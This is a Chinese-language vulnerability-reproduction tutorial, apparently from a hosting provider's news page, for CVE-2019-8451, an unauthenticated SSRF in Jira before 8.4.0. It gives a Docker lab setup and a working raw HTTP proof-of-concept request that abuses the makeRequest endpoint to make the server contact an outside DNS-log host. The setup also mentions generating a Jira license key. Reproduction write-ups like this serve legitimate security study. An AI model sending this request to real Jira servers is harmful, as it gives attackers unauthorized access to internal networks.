您好,登錄后才能下訂單哦!
這期內(nèi)容當中小編將會給大家?guī)碛嘘P(guān)Jira未授權(quán)SSRF產(chǎn)生CVE-2019-8451漏洞復(fù)現(xiàn)的示例分析,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
0x00 簡介
JIRA是Atlassian公司出品的項目與事務(wù)跟蹤工具,被廣泛應(yīng)用于缺陷跟蹤、客戶服務(wù)、需求收集、流程審批、任務(wù)跟蹤、項目跟蹤和敏捷管理等工作領(lǐng)域。
0x01 漏洞概述
Jira的/plugins/servlet/gadgets/makeRequest資源存在SSRF漏洞,原因在于JiraWhitelist這個類的邏輯缺陷,成功利用此漏洞的遠程攻擊者可以以Jira服務(wù)端的身份訪問內(nèi)網(wǎng)資源。經(jīng)分析,此漏洞無需任何憑據(jù)即可觸發(fā)。(來自奇安信CERT)
0x02 影響范圍
Jira < 8.4.0
0x03 環(huán)境搭建
在線靶場
開放時間(當前-9月29日20:00)
獲取方式(完成任意一個):
1、將本文轉(zhuǎn)發(fā)至朋友圈并配文字,截圖發(fā)至公眾號內(nèi)
2、聯(lián)系作者,五元紅包
自行搭建
使用docker進行搭建,執(zhí)行以下命令開啟環(huán)境
docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0
訪問ip:8080進行安裝
下圖選擇第二個
繼續(xù)即可
點擊next,后面漏了兩張圖
去生成JIRA使用許可證
生成之后找到License Key,回到頁面填上License Key繼續(xù)安裝
至此,安裝完畢。
0x04 漏洞利用
先訪問ip:8080,然后刷新抓包
將數(shù)據(jù)包替換為如下Poc:
GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1Host: 192.168.198.133:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.198.133:8080/secure/Dashboard.jspaX-Atlassian-Token: no-checkContent-Length: 2
其中ip替換為目標ip,共三處
@后面改為你的dnslog的地址
repeater發(fā)包
去dnslog中刷新查看結(jié)果,可以看到有流量經(jīng)過
如果訪問未開放端口,結(jié)果是這樣的:
上述就是小編為大家分享的Jira未授權(quán)SSRF產(chǎn)生CVE-2019-8451漏洞復(fù)現(xiàn)的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道。
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。